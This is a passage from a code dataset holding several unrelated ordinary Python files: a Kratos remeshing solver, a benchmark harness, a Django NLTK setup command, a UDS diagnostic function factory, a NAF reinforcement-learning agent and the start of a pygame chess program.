(For adaptive remeshing)\n See contact_structural_mechanics_implicit_dynamic_solver.py for more information.\n \"\"\"\n def __init__(self, model, custom_settings):\n # Set defaults and validate custom settings.\n self.adaptative_remeshing_utilities = adaptative_remeshing_contact_structural_mechanics_utilities.AdaptativeRemeshingContactMechanicalUtilities()\n\n # Construct the base solver.\n super(AdaptativeRemeshingContactImplicitMechanicalSolver, self).__init__(model, custom_settings)\n KM.Logger.PrintInfo(\"::[AdaptativeRemeshingContactImplicitMechanicalSolver]:: \", \"Construction finished\")\n\n #### Private functions ####\n\n def AddVariables(self):\n super(AdaptativeRemeshingContactImplicitMechanicalSolver, self).AddVariables()\n if has_meshing_application:\n self.main_model_part.AddNodalSolutionStepVariable(KM.NODAL_H)\n KM.Logger.PrintInfo(\"::[AdaptativeRemeshingContactImplicitMechanicalSolver]:: \", \"Variables ADDED\")\n\n def get_remeshing_process(self):\n if not hasattr(self, '_remeshing_process'):\n self._remeshing_process = self._create_remeshing_process()\n return self._remeshing_process\n\n def _create_remeshing_process(self):\n if self.main_model_part.ProcessInfo[KM.DOMAIN_SIZE] == 2:\n remeshing_process = MA.MmgProcess2D(self.main_model_part, self.settings[\"remeshing_parameters\"])\n else:\n remeshing_process = MA.MmgProcess3D(self.main_model_part, self.settings[\"remeshing_parameters\"])\n\n return remeshing_process\n\n def get_metric_process(self):\n if not hasattr(self, '_metric_process'):\n self._metric_process = self._create_metric_process()\n return self._metric_process\n\n def _create_metric_process(self):\n if self.main_model_part.ProcessInfo[KM.DOMAIN_SIZE] == 2:\n metric_process = MA.MetricErrorProcess2D(self.main_model_part, self.settings[\"metric_error_parameters\"])\n else:\n metric_process = MA.MetricErrorProcess3D(self.main_model_part, self.settings[\"metric_error_parameters\"])\n\n return metric_process\n\n def _CreateConvergenceCriterion(self):\n error_criteria = self.settings[\"convergence_criterion\"].GetString()\n conv_settings = self._get_convergence_criterion_settings()\n return self.adaptative_remeshing_utilities.GetConvergenceCriteria(error_criteria, conv_settings)\n\n @classmethod\n def GetDefaultParameters(cls):\n this_defaults = adaptative_remeshing_contact_structural_mechanics_utilities.AdaptativeRemeshingContactMechanicalUtilities().GetDefaultParameters()\n this_defaults.AddMissingParameters(super().GetDefaultParameters())\n return this_defaults\n","sub_path":"applications/ContactStructuralMechanicsApplication/python_scripts/adaptative_remeshing_contact_structural_mechanics_implicit_dynamic_solver.py","file_name":"adaptative_remeshing_contact_structural_mechanics_implicit_dynamic_solver.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"599612691","text":"import config as cf\nimport sys\nimport controller\nimport xlsxwriter\nassert cf\n\ndefault_limit = 1000\nsys.setrecursionlimit(default_limit*10)\n\ndef TestFunction(catalog, option, data_structure, sorting_method, input_1, input_2, input_3):\n if option == 1:\n artists_sample_size = input_1\n artworks_sample_size = input_2\n catalog = controller.initCatalog(data_structure)\n controller.loadData(catalog, data_structure, artists_sample_size, artworks_sample_size)\n result = catalog\n\n elif option == 2:\n initial_birth_year = input_1\n end_birth_year = input_2\n requirement_info = 
controller.getArtistsByBirthYear(catalog, data_structure,\n initial_birth_year, end_birth_year)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 3:\n initial_adquisiton_date = input_1\n end_adquisition_date = input_2\n requirement_info = controller.getArtworksByAdquisitonDate(catalog, data_structure, sorting_method,\n initial_adquisiton_date, end_adquisition_date)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 4:\n artist_name = input_1\n requirement_info = controller.getArtworksByMediumAndArtist(catalog, artist_name)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 5:\n requirement_info = controller.getNationalitiesByNumArtworks(catalog, data_structure, sorting_method)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 6: \n department = input_1\n requirement_info = controller.getTransportationCostByDepartment(catalog, data_structure, \n sorting_method, department)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n else:\n num_artists = input_1\n initial_birth_year = input_2\n end_birth_year = input_3\n requirement_info = controller.getMostProlificArtists(catalog, data_structure, sorting_method,\n initial_birth_year, end_birth_year, num_artists)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n return result\n\ndef InitiateFunction():\n requeriment_test = { 2: (1900, 1905, 0),\n 3: ('1985-01-01', '2000-01-01', 0),\n 4: ('Alexei Jawlensky', 0, 0),\n 5: (0, 0, 0),\n 6: ('Drawings & Prints', 0, 0),\n 7: (3, 1900, 1905)}\n data_structure_test = { (381, 346):requeriment_test,\n (762, 691):requeriment_test,\n (1141, 1037):requeriment_test,\n (1523, 1382):requeriment_test,\n (1903, 1727):requeriment_test,\n (2284, 2073):requeriment_test}\n Test_Data = { 'SINGLE_LINKED':data_structure_test,\n 'ARRAY_LIST':data_structure_test}\n\n\n workbook = xlsxwriter.Workbook('Test_Data.xlsx')\n worksheet = workbook.add_worksheet()\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I','J', 'K', 'L', 'M',\n 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n initial_x_position = 0\n for data_structure in Test_Data:\n data_structure_info = Test_Data[data_structure]\n initial_y_position = -9\n for sample in data_structure_info:\n input_1 = sample[0]\n input_2 = sample[1]\n print('')\n print(None, 1, data_structure, 0, input_1, input_2, 0)\n print('...')\n catalog = TestFunction(None, 1, data_structure, 0, input_1, input_2, 0)\n sample_info = data_structure_info[sample]\n initial_y_position += 1\n y_position = initial_y_position\n for requirement in sample_info:\n inputs = sample_info[requirement]\n input_1 = inputs[0]\n input_2 = inputs[1]\n input_3 = inputs[2]\n y_position += 9\n x_position_time = initial_x_position\n for sorting_method in range(1,5):\n x_position_time += 1 \n position_time_index = alphabet[x_position_time - 1] + str(y_position)\n print(sample, requirement, data_structure, sorting_method, input_1, input_2, input_3)\n elapsed_time = TestFunction(catalog, requirement, data_structure, sorting_method, input_1, input_2, input_3)\n worksheet.write(position_time_index, elapsed_time)\n initial_x_position += 5\n workbook.close()\n\nInitiateFunction()","sub_path":"App/Test_Function.py","file_name":"Test_Function.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"634688002","text":"def histogram(t):\n d = {}\n for x in t:\n d[x] = 
d.get(x,0) + 1\n return d\n\ndef choose_from_hist(dist):\n import random\n letters = []\n for a,b in dist.items():\n for i in range(b):\n letters.append(a)\n return random.choice(letters)","sub_path":"ex_13.5.py","file_name":"ex_13.5.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"144940477","text":"from django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom optparse import make_option\nimport nltk as py_nltk\nimport os\n\nclass Command(BaseCommand):\n args = 'command'\n help = ''\n\n def handle(self, *args, **options):\n if hasattr(settings, 'NLTK_DATAPATH'):\n NLTK_DATAPATH = settings.NLTK_DATAPATH\n else:\n NLTK_DATAPATH = os.path.join(os.path.dirname(py_nltk.__file__), \"data\")\n required_packages = ['punkt', 'floresta', 'mac_morpho', 'stopwords', 'wordnet']\n installed = all(py_nltk.downloader._downloader.is_installed(package, download_dir=NLTK_DATAPATH) for package in required_packages)\n if not installed:\n py_nltk.download(required_packages, download_dir=NLTK_DATAPATH)\n\n","sub_path":"mail/management/commands/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"494399729","text":"import os\nfrom collections import OrderedDict\n\nclass Clusters(OrderedDict):\n def __getitem__(self, item):\n try:\n value = dict.__getitem__(self, item)\n except KeyError:\n raise Exception(\"The current hostname '%s' was not included in the variable\"\"\" % item +\n \" 'Clusters' in the CalcTrollHosts.py file. Please edit this file.\")\n else:\n return value\n\nCLUSTERS = Clusters()\nDEFAULT_CLUSTER_KEY = os.uname()[1]\n","sub_path":"CalcTroll/Core/Submission/Clusters.py","file_name":"Clusters.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336501778","text":"#!/usr/bin/env python\n\n__author__ = \"Richard Clubb\"\n__copyrights__ = \"Copyright 2018, the python-uds project\"\n__credits__ = [\"Richard Clubb\"]\n\n__license__ = \"MIT\"\n__maintainer__ = \"Richard Clubb\"\n__email__ = \"richard.clubb@embeduk.com\"\n__status__ = \"Development\"\n\n\nfrom uds.uds_config_tool import DecodeFunctions\nimport sys\nfrom uds.uds_config_tool.FunctionCreation.iServiceMethodFactory import IServiceMethodFactory\n\n\n# When encode the dataRecord for transmission we have to allow for multiple elements in the data record\n# i.e. 'value1' - for a single value, or [('param1','value1'),('param2','value2')] for more complex data records\nrequestFuncTemplate = str(\"def {0}(FormatIdentifier, MemoryAddress, MemorySize):\\n\"\n \" addrlenfid = [len(MemoryAddress) + (len(MemorySize)<<4)]\\n\"\n \" return {1} + FormatIdentifier + addrlenfid + MemoryAddress + MemorySize\")\t\t\t\t\t\t \n\ncheckFunctionTemplate = str(\"def {0}(input):\\n\"\n \" serviceIdExpected = {1}\\n\"\n \" serviceId = DecodeFunctions.buildIntFromList(input[{2}:{3}])\\n\"\n \" addrlenfid = DecodeFunctions.buildIntFromList(input[{3}:{3}+1]) # ... next byte\\n\"\n \" totalLength = {4} + 1 + (addrlenfid>>4) # ... length of sid, length of addrlenfid, length of maxNumOfBlockLen extracted from addrlenfid\\n\"\n \" if(len(input) != totalLength): raise Exception(\\\"Total length returned not as expected. 
Expected: totalLength; Got {{0}}\\\".format(len(input)))\\n\"\n \" if(serviceId != serviceIdExpected): raise Exception(\\\"Service Id Received not expected. Expected {{0}}; Got {{1}} \\\".format(serviceIdExpected, serviceId))\")\n\nnegativeResponseFuncTemplate = str(\"def {0}(input):\\n\"\n \" result = {{}}\\n\"\n \" nrcList = {5}\\n\"\n \" if input[{1}:{2}] == [{3}]:\\n\"\n \" result['NRC'] = input[{4}]\\n\"\n \" result['NRC_Label'] = nrcList.get(result['NRC'])\\n\"\n \" return result\")\n\nencodePositiveResponseFuncTemplate = str(\"def {0}(input):\\n\"\n \" result = {{}}\\n\"\n \" result['LengthFormatIdentifier'] = input[1:2]\\n\"\n \" lenMNOBL = (result['LengthFormatIdentifier'][0])>>4\\n\"\n \" result['MaxNumberOfBlockLength'] = input[2:2+lenMNOBL]\\n\"\n \" return result\")\n\n\nclass RequestDownloadMethodFactory(IServiceMethodFactory):\n\n ##\n # @brief method to create the request function for the service element\n # The parameters for request download are fixed in format, so we can simply take fixed paramters and format the message accordingly\n # i.e. we're less reliant on what the odx file says in this case.\n @staticmethod\n def create_requestFunction(diagServiceElement, xmlElements):\n serviceId = 0\n\n shortName = \"request_{0}\".format(diagServiceElement.find('SHORT-NAME').text)\n requestElement = xmlElements[diagServiceElement.find('REQUEST-REF').attrib['ID-REF']]\n paramsElement = requestElement.find('PARAMS')\n\n encodeFunctions = []\n encodeFunction = \"None\"\n\n for param in paramsElement:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n if(semantic == 'SERVICE-ID'):\n serviceId = [int(param.find('CODED-VALUE').text)]\n elif semantic == 'DATA':\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n # ... if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on.\n\n funcString = requestFuncTemplate.format(shortName,\n serviceId)\n exec(funcString)\n return locals()[shortName]\n\n\n\n ##\n # @brief method to create the function to check the positive response for validity\n # The response for request download are fixed in format, so we can check the message accordingly\n # i.e. we're less reliant on what the odx file says in this case.\n @staticmethod\n def create_checkPositiveResponseFunction(diagServiceElement, xmlElements):\n responseId = 0\n\n responseIdStart = 0\n responseIdEnd = 0\n\n shortName = diagServiceElement.find('SHORT-NAME').text\n checkFunctionName = \"check_{0}\".format(shortName)\n positiveResponseElement = xmlElements[(diagServiceElement.find('POS-RESPONSE-REFS')).find('POS-RESPONSE-REF').attrib['ID-REF']]\n\n paramsElement = positiveResponseElement.find('PARAMS')\n\n responseLength = 0\n\n for param in paramsElement:\n try:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n startByte = int(param.find('BYTE-POSITION').text)\n\n if(semantic == 'SERVICE-ID'):\n responseId = int(param.find('CODED-VALUE').text)\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength / 8)\n responseIdStart = startByte\n responseIdEnd = startByte + listLength\n responseLength += listLength\n\n elif(semantic == 'DATA'):\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n\t\t\t\t # ... 
if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on. \n\n else:\n pass\n except:\n #print(sys.exc_info())\n pass\n\n checkFunctionString = checkFunctionTemplate.format(checkFunctionName, # 0\n responseId, # 1\n responseIdStart, # 2\n responseIdEnd, # 3\n responseLength) # 4\n exec(checkFunctionString)\n return locals()[checkFunctionName]\n\n\n def create_encodePositiveResponseFunction(diagServiceElement, xmlElements):\n\n positiveResponseElement = xmlElements[(diagServiceElement.find('POS-RESPONSE-REFS')).find('POS-RESPONSE-REF').attrib['ID-REF']]\n\n shortName = diagServiceElement.find('SHORT-NAME').text\n encodePositiveResponseFunctionName = \"encode_{0}\".format(shortName)\n\n params = positiveResponseElement.find('PARAMS')\n\n responseLength = 0\n encodeFunctions = []\n\n for param in params:\n try:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n if(semantic == 'SERVICE-ID'):\n responseId = int(param.find('CODED-VALUE').text)\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength / 8)\n responseIdStart = startByte\n responseIdEnd = startByte + listLength\n responseLength += listLength\n\n if semantic == 'DATA':\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n\t\t\t\t # ... if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on. \n\n except:\n pass\n\n encodeFunctionString = encodePositiveResponseFuncTemplate.format(encodePositiveResponseFunctionName)\n exec(encodeFunctionString)\n return locals()[encodePositiveResponseFunctionName]\n\n\n\n ##\n # @brief method to create the negative response function for the service element\n @staticmethod\n def create_checkNegativeResponseFunction(diagServiceElement, xmlElements):\n shortName = diagServiceElement.find('SHORT-NAME').text\n check_negativeResponseFunctionName = \"check_negResponse_{0}\".format(shortName)\n\n negativeResponsesElement = diagServiceElement.find('NEG-RESPONSE-REFS')\n\n negativeResponseChecks = []\n\n for negativeResponse in negativeResponsesElement:\n negativeResponseRef = xmlElements[negativeResponse.attrib['ID-REF']]\n\n negativeResponseParams = negativeResponseRef.find('PARAMS')\n\n for param in negativeResponseParams:\n\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except:\n semantic = None\n\n bytePosition = int(param.find('BYTE-POSITION').text)\n\n if semantic == 'SERVICE-ID':\n serviceId = param.find('CODED-VALUE').text\n start = int(param.find('BYTE-POSITION').text)\n diagCodedType = param.find('DIAG-CODED-TYPE')\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength/8)\n end = start + listLength\n elif bytePosition == 2:\n nrcPos = bytePosition\n expectedNrcDict = {}\n try:\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n nrcList = dataObjectElement.find('COMPU-METHOD').find('COMPU-INTERNAL-TO-PHYS').find('COMPU-SCALES')\n for nrcElem in nrcList:\n expectedNrcDict[int(nrcElem.find('UPPER-LIMIT').text)] = nrcElem.find('COMPU-CONST').find('VT').text\n except:\n pass\n pass\n\n negativeResponseFunctionString = negativeResponseFuncTemplate.format(check_negativeResponseFunctionName, start, end, serviceId, nrcPos, expectedNrcDict)\n exec(negativeResponseFunctionString)\n return 
locals()[check_negativeResponseFunctionName]\n","sub_path":"uds/uds_config_tool/FunctionCreation/RequestDownloadMethodFactory.py","file_name":"RequestDownloadMethodFactory.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"309370815","text":"from logging import getLogger\n\nfrom .utils import core\n\nlogger = getLogger(__name__)\n\nimport numpy as np\nimport tensorflow as tf\nfrom .utils.prioritised_experience_replay import PrioritizedReplayBuffer\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for NAF_debug agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n if self.size < batch_size:\n idxs = np.arange(self.size)\n else:\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\nclass ReplayBufferPER(PrioritizedReplayBuffer):\n \"\"\"\n A simple FIFO experience replay buffer for NAF_debug agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size, prio_info):\n self.alpha = prio_info.get('alpha')\n self.beta = prio_info.get('beta')\n super(ReplayBufferPER, self).__init__(size, self.alpha)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n super(ReplayBufferPER, self).add(obs, act, rew, next_obs, done, 1)\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32, **kwargs):\n if 'beta' in kwargs:\n self.beta = kwargs.get('beta')\n # print('kw beta', self.beta)\n # print('test', self.size, batch_size)\n if self.size < batch_size:\n batch_size = self.size\n obs1, acts, rews, obs2, done, gammas, weights, idxs = super(ReplayBufferPER, self).sample_normal(batch_size)\n else:\n obs1, acts, rews, obs2, done, gammas, weights, idxs = super(ReplayBufferPER, self).sample(\n batch_size=batch_size,\n beta=self.beta)\n return dict(obs1=obs1,\n obs2=obs2,\n acts=acts,\n rews=rews,\n done=done), [weights, idxs]\n\n\nclass NAF(object):\n def __init__(self, sess,\n env, stat,\n discount, batch_size, learning_rate,\n max_steps, update_repeat, max_episodes, tau, pretune=None, prio_info=dict(), noise_info=dict(),\n **nafnet_kwargs):\n '''\n :param sess: current tensorflow session\n :param env: open gym environment to be solved\n :param stat: statistic class to handle tensorflow and statitics\n :param discount: discount factor\n :param batch_size: batch size for the training\n :param learning_rate: learning rate\n :param max_steps: maximal steps per episode\n :param update_repeat: iteration per step of training\n :param max_episodes: maximum number of episodes\n :param tau: polyac averaging\n :param pretune: 
list of tuples of state action reward next state done\n :param prio_info: parameters to handle the prioritizing of the buffer\n :param nafnet_kwargs: keywords to handle the network\n :param noise_info: dict with noise_function\n '''\n self.pretune = pretune\n self.prio_info = prio_info\n self.per_flag = bool(self.prio_info)\n print('PER is:', self.per_flag)\n self.sess = sess\n self.env = env\n if 'noise_function' in noise_info:\n self.noise_function = noise_info.get('noise_function')\n else:\n self.noise_function = lambda nr: 1 / (nr + 1)\n\n if 'batch_info' in nafnet_kwargs:\n self.batch_function = nafnet_kwargs.get('batch_info')\n print(10 * '-', self.batch_function)\n else:\n self.batch_function = lambda nr: self.batch_size\n\n if 'decay_info' in nafnet_kwargs:\n self.decay_function = nafnet_kwargs.get('decay_info')\n print(10 * '-', self.decay_function)\n else:\n self.decay_function = lambda nr: 1\n\n if 'beta_decay' in prio_info:\n self.beta_decay_function = prio_info.get('beta_decay')\n elif self.per_flag:\n self.beta_decay_function = lambda nr: max(1e-12, prio_info.get('beta_start') - nr / 100)\n else:\n self.beta_decay_function = lambda nr: 1\n self.x_ph, self.a_ph, self.mu, self.V, self.Q, self.P, self.A, self.vars_pred \\\n = core.mlp_normalized_advantage_function(env.observation_space.shape, act_dim=env.action_space.shape,\n **nafnet_kwargs,\n scope='main')\n self.x_ph_targ, self.a_ph_targ, self.mu_targ, self.V_targ, self.Q_targ, self.P_targ, self.A_targ, \\\n self.vars_targ \\\n = core.mlp_normalized_advantage_function(env.observation_space.shape, act_dim=env.action_space.shape,\n **nafnet_kwargs,\n scope='target')\n self.stat = stat\n self.discount = discount\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.action_size = env.action_space.shape[0]\n self.obs_dim = env.observation_space.shape[0]\n\n self.max_steps = max_steps\n self.update_repeat = update_repeat\n self.max_episodes = max_episodes\n self.current_step = 0\n\n if not (self.per_flag):\n self.replay_buffer = ReplayBuffer(obs_dim=self.obs_dim, act_dim=self.action_size, size=int(1e6))\n else:\n self.replay_buffer = ReplayBufferPER(obs_dim=self.obs_dim, act_dim=self.action_size, size=int(1e6),\n prio_info=prio_info)\n\n with tf.name_scope('optimizer'):\n self.target_y = tf.placeholder(tf.float32, [None], name='target_y')\n self.per_weights = tf.placeholder(tf.float32, [None], name='per_weights')\n # self.loss = tf.reduce_mean(tf.squared_difference(self.target_y, tf.squeeze(self.Q)),\n # name='loss')\n self.loss = tf.losses.mean_squared_error(self.target_y, tf.squeeze(self.Q), weights=self.per_weights)\n self.optim = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n # self.gvs = self.optim.compute_gradients(self.loss)\n # self.modified_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in self.gvs]\n # self.train_op = self.optim.apply_gradients(self.modified_gvs)\n\n self.target_init = tf.group([tf.assign(v_targ, v_main)\n for v_main, v_targ in zip(self.vars_pred, self.vars_targ)])\n\n # Polyak averaging for target variables (previous soft update)\n polyak = 1 - tau\n self.target_update = tf.group([tf.assign(v_targ, polyak * v_targ + (1 - polyak) * v_main)\n for v_main, v_targ in zip(self.vars_pred, self.vars_targ)])\n self.losses = []\n self.vs = []\n\n def run(self, is_train=True):\n print('Training:', is_train)\n # tf.initialize_all_variables().run()\n self.stat.set_variables(self.vars_pred)\n self.stat.load_model() # including init\n # if is_train:\n # 
self.sess.run(self.target_init)\n\n # pretune------------------------------------------------------------------------------\n if not (self.pretune is None):\n scan_data = self.pretune\n print('Length of scan data is: ', len(scan_data))\n\n if scan_data:\n for i, data in enumerate(scan_data):\n o, a, r, o2, d, _ = data\n self.replay_buffer.store(o, a, r, o2, d)\n print(\"Number: \", i)\n print(o, a, r, o2, d)\n\n batch_size_temp = self.batch_size\n self.batch_size = 10\n for _ in range(10 * len(scan_data)):\n q, v, a, l = self.perceive()\n if self.stat:\n self.stat.on_step(a, r, d, q, v, a, l)\n\n self.batch_size = batch_size_temp\n # -------------------------------------------------------------------------\n\n for self.idx_episode in range(self.max_episodes):\n o = self.env.reset()\n\n for t in range(0, self.max_steps):\n # 1. predict\n a = self.predict(o, is_train)\n # 2. step\n o2, r, d, _ = self.env.step(a)\n if is_train:\n self.replay_buffer.store(o, a, r, o2, d)\n o = o2\n d = False if t == self.max_steps - 1 else d\n # 3. perceive\n self.current_step = t\n if is_train:\n pass\n q, v, a, l = self.perceive()\n if self.stat:\n self.stat.on_step(a, r, d, q, v, a, l)\n if d:\n break\n\n print('episode:', self.idx_episode, 'length:', t)\n def predict(self, state, is_train):\n u = self.sess.run(self.mu, feed_dict={self.x_ph: [state]})[0]\n if is_train:\n noise_scale = self.noise_function(self.idx_episode)\n return u + noise_scale * np.random.randn(self.action_size)\n else:\n return u\n\n def perceive(self):\n q_list = []\n v_list = []\n a_list = []\n l_list = []\n\n beta_decay = self.beta_decay_function(self.idx_episode)\n batch_size = self.batch_function(self.idx_episode)\n loss_decay = self.decay_function(self.idx_episode)\n\n for iteration in range(self.update_repeat):\n if self.per_flag:\n batch, priority_info = self.replay_buffer.sample_batch(batch_size=batch_size, beta=beta_decay)\n else:\n batch = self.replay_buffer.sample_batch(batch_size)\n\n o = batch['obs1']\n o2 = batch['obs2']\n a = batch['acts']\n r = batch['rews']\n\n if self.per_flag:\n w = priority_info[0]\n # print('weights', priority_info[1])\n else:\n w = np.ones(r.shape[-1])\n\n v = self.sess.run(self.V_targ, feed_dict={self.x_ph_targ: o2, self.a_ph_targ: a})\n target_y = self.discount * np.squeeze(v) + r\n\n _, l, q, v, a = self.sess.run([\n self.optim, self.loss,\n self.Q, self.V, self.A,\n ], {\n self.target_y: target_y,\n self.x_ph: o,\n self.a_ph: a,\n self.per_weights: w\n })\n\n q_list.extend(q)\n v_list.extend(v)\n a_list.extend(a)\n l_list.append(l)\n\n # self.target_network.soft_update_from(self.pred_network)\n\n if self.per_flag:\n # priorities = np.ones(priority_info[0].shape[-1]) * (abs(l) * 1 + 1e-7)\n factor = 1e-12 + l * (loss_decay)\n # print('fac', factor, loss_decay, beta_decay)\n priorities = np.ones(priority_info[0].shape[-1]) * factor\n # print('priorities', priorities)\n self.replay_buffer.update_priorities(idxes=priority_info[1], priorities=priorities)\n\n logger.debug(\"ep:,%s, q: %s, v: %s, a: %s, l: %s\" \\\n % (self.idx_episode, np.mean(q), np.mean(v), np.mean(a), np.mean(l)))\n self.sess.run(self.target_update)\n self.losses.append(np.mean(l))\n self.vs.append(np.mean(v))\n # print('batch_size', batch_size)\n return np.sum(q_list), np.sum(v_list), np.sum(a_list), np.sum(l_list)\n","sub_path":"pernaf/pernaf/naf.py","file_name":"naf.py","file_ext":"py","file_size_in_byte":12581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
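The `ReplayBuffer` in the `naf.py` record above advances a circular write pointer, `self.ptr = (self.ptr + 1) % self.max_size`, so the oldest transitions are overwritten once the buffer is full, and `sample_batch` draws indices only from the `self.size` rows that actually hold data. A minimal standalone sketch of that same pattern (the `RingBuffer` name and shapes here are illustrative, not taken from the record):

```python
import numpy as np

class RingBuffer:
    """Fixed-capacity FIFO store; the oldest rows are overwritten when full."""

    def __init__(self, capacity, dim):
        self.data = np.zeros((capacity, dim), dtype=np.float32)
        self.ptr = 0        # next write position
        self.size = 0       # number of rows holding valid data
        self.capacity = capacity

    def store(self, row):
        self.data[self.ptr] = row
        self.ptr = (self.ptr + 1) % self.capacity      # wrap around at capacity
        self.size = min(self.size + 1, self.capacity)  # saturates at capacity

    def sample(self, batch_size=32):
        # Mirror ReplayBuffer.sample_batch: take the whole valid region when
        # fewer than batch_size rows have been stored so far.
        if self.size < batch_size:
            idxs = np.arange(self.size)
        else:
            idxs = np.random.randint(0, self.size, size=batch_size)
        return self.data[idxs]

if __name__ == "__main__":
    buf = RingBuffer(capacity=4, dim=2)
    for i in range(6):  # six writes into four slots: the two oldest rows get overwritten
        buf.store(np.array([i, i], dtype=np.float32))
    assert buf.size == 4 and buf.ptr == 2  # the pointer wrapped past the end once
```

The target-network update in the same record, `tf.assign(v_targ, polyak * v_targ + (1 - polyak) * v_main)` with `polyak = 1 - tau`, is the usual soft (Polyak-averaged) update `theta_targ <- (1 - tau) * theta_targ + tau * theta_main`.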
+{"seq_id":"292402218","text":"\"\"\"\n--> main driver file\n--> handle input data\n--> display current GameState object\n\"\"\"\nimport pygame as p\nfrom MyChess import ChessEngine\nfrom MyChess import SmartMoves\n\nWIDTH = HEIGHT = 480 # can use 400\nDIMENSION = 8 # 8x8 board\nSQ_SIZE = HEIGHT // DIMENSION\nMAX_FPS = 15 # for animation\nIMAGES = {}\nCOLORS = [p.Color('light gray'), p.Color('dark gray')]\n'''\nInitialize a global dictionary of images. This will be called exactly once in the main\n'''\n\n\ndef loadImages():\n pieces = ['wp', 'wR', 'wN', 'wB', 'wQ', 'wK', 'bp', 'bR', 'bN', 'bB', 'bQ', 'bK']\n for piece in pieces:\n IMAGES[piece] = p.transform.scale(p.image.load(\"images/\" + piece + \".png\"), (SQ_SIZE, SQ_SIZE))\n'''\nmain driver for our code. This will handle user input and updating the graphics\n'''\n\n\ndef main():\n p.init()\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n screen.fill(p.Color(\"white\"))\n gs = ChessEngine.GameState()\n validMoves = gs.getValidMoves() # store all current valid moves\n moveMade = False # flag for move made\n loadImages() # only once\n light = \"light gray\"\n dark = \"dark gray\"\n running = True\n animate = False\n gameOver = False\n playerOne = True # if white is human this is True\n playerTwo = True # if black is human this is True\n sqSelected = () # no square selected initially (row, col)\n playerClicks = [] # [(xi, yi), (xf, yf)]\n while running:\n humanTurn = (gs.whiteToMove and playerOne) or (not gs.whiteToMove and playerTwo)\n for e in p.event.get():\n if e.type == p.QUIT:\n running = False\n elif e.type == p.MOUSEBUTTONDOWN:\n if not gameOver and humanTurn:\n location = p.mouse.get_pos() # (x, y) location of mouse click\n col = location[0] // SQ_SIZE\n row = location[1] // SQ_SIZE\n if sqSelected == (row, col): # selecting same square twice\n sqSelected = () # ignore double clicks\n playerClicks = []\n else:\n sqSelected = (row, col)\n playerClicks.append(sqSelected)\n if len(playerClicks) == 2: # two clicks done\n move = ChessEngine.Move(playerClicks[0], 